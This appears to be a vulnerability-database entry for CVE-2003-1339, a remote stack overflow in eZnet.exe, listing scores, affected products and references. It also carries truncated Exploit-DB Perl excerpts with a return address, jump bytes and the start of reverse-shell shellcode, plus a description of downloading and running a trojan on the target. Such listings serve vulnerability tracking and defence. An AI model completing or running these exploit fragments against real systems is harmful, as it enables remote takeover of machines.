CVE-2003-1339
published 2003-12-31CVE-2003-1339: Stack-based buffer overflow in eZnet.exe, as used in eZ (a) eZphotoshare, (b) eZmeeting, (c) eZnetwork, and (d) eZshare allows remote attackers to cause a…
PriorityP347critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
48.61%
98.7th percentile
Stack-based buffer overflow in eZnet.exe, as used in eZ (a) eZphotoshare, (b) eZmeeting, (c) eZnetwork, and (d) eZshare allows remote attackers to cause a denial of service (crash) or execute arbitrary code, as demonstrated via (1) a long GET request and (2) a long operation or autologin parameter to SwEzModule.dll.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ezmeeting | ezmeeting | — | — |
| ezmeeting | ezmeeting | — | — |
| ezmeeting | ezmeeting | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Eznet 3.5.0 - Remote Stack Overflow Universal
exploitdb·2003-12-18
CVE-2003-1339 Eznet 3.5.0 - Remote Stack Overflow Universal
Eznet 3.5.0 - Remote Stack Overflow Universal
---
#!/usr/bin/perl -w
#########C###O###R###O###M###P###U###T###E###R###########
# [Crpt] universal eZ v3.3 3) {
print "syntax: ".$0." \r\n";
exit;
}
print "[+] Connecting to ".$ARGV[0]."\t...";
my $sock = IO::Socket::INET->new(Proto=>'tcp',
PeerAddr=>$ARGV[0],
PeerPort=>"80");
if(!$sock) {
print "Error\r\n";
exit;
}
print "Done\r\n";
# 0xffe4 jmp esp in Cryptso.dll (v3.3 v3.4 v3.5 @ 0x1004C72B)
# 0xffffedffe9 jmp back ($ - 4'608)
$eip = "\x2B\xC7\x04\x10";
$jmp_back = "\xE9\xFF\xED\xFF\xFF";
# universal reverse remote shell using PEB, coded by kralor.
$shellc0deI = "\xeb\x02\xeb\x0f\x66\x81\xec\x04\x08\x8b\xec\x83\xec\x50\xe8\xef".
"\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\x9e\x01\x80\x33\x95".
"\x43\xe2\xfa\x7e\xe6\xa6\x4e\x26\xa5\
Exploit-DB
Eznet 3.5.0 - Remote Stack Overflow / Denial of Service
exploitdb·2003-12-15
CVE-2003-1339 Eznet 3.5.0 - Remote Stack Overflow / Denial of Service
Eznet 3.5.0 - Remote Stack Overflow / Denial of Service
---
#!/usr/bin/perl -w
#
# Stack Overflow in eZnet.exe - Remote Exploit
#
# Will download a trojan from any address which you provide
# on the target system, then will execute the trojan.
#
# For this exploit I have tried several strategies to increase
# reliability and performance:
#
# + Jump to a static 'call esp'
# + Backwards jump to code a known distance from the stack pointer
# since the stack address seems to change for each version of
# eznet.
# + Works out the byte difference for custom urls
# (must be no longer than 254 bytes!!)
# + Causes eznet.exe to restart (not really my choice ;o)
# + Shellcode steals addresses from a static module.
#
# (Shellcode is attached to the bottom of this file!)
#
# - by Peter Winter-Smith [p
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=107090390002654&w=2http://seclists.org/bugtraq/2003/Dec/0195.htmlhttp://securitytracker.com/id?1008412http://www.governmentsecurity.org/archive/t5390.htmlhttps://www.exploit-db.com/exploits/133http://marc.info/?l=bugtraq&m=107090390002654&w=2http://seclists.org/bugtraq/2003/Dec/0195.htmlhttp://securitytracker.com/id?1008412http://www.governmentsecurity.org/archive/t5390.htmlhttps://www.exploit-db.com/exploits/133
2003-12-31
Published